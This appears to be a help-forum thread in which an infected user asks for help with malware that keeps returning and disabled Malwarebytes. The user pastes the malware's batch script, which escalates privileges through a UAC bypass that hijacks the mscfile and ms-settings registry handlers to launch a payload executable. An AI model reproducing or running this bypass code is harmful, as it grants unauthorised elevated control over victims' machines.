maltastic

Fixlog.txt

awesome I Will try this once I get home from work this morning will be a few hours as I am on nights right now

I think this is it? mbst-grab-results.zip

so I scanned with malwarebytes and not even 15 mins later this happens random extractor opens and malwarebyte's is removed meaning it has bypassed malwarebytes? idk some help would be great https://imgur.com/a/9fpbTNI here is the code of the malware in the .bat [ this and a .vbs + the service.exe keeps appearing ] @echo off set PAYLOAD=C:\Users\Public\Documents\Service.exe net session >nul 2>&1 || goto :label %PAYLOAD% exit /b 2 :label whoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1 if ERRORLEVEL 1 exit /b 1 for /f "tokens=4-5 delims=. " %%i in ('ver') do set WIN_VER=%%i.%%j set key="HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" for /f "skip=2 tokens=3" %%U in ('REG QUERY %key% /v ConsentPromptBehaviorAdmin') do set /a "UAC=%%U" if %UAC% equ 2 exit /b 1 if %UAC% equ 5 ( for %%V in (6.1 6.2 6.3) do if "%WIN_VER%" == "%%V" call :exploit mscfile CompMgmtLauncher.exe %PAYLOAD% if "%WIN_VER%" == "10.0" call :exploit ms-settings ComputerDefaults.exe %PAYLOAD% )>nul 2>&1 if %UAC% equ 0 powershell -c Start-Process "%PAYLOAD%" -Verb runas exit /b 0 :exploit <key> <trigger> <payload> set regPath="HKCU\Software\Classes\%1\shell\open\command" reg add %regPath% /d "%~3" /f reg add %regPath% /v DelegateExecute /f %~2 reg delete "HKCU\Software\Classes\%1" /f exit /b I tried to use my own code to remove it but it keeps appearing ;P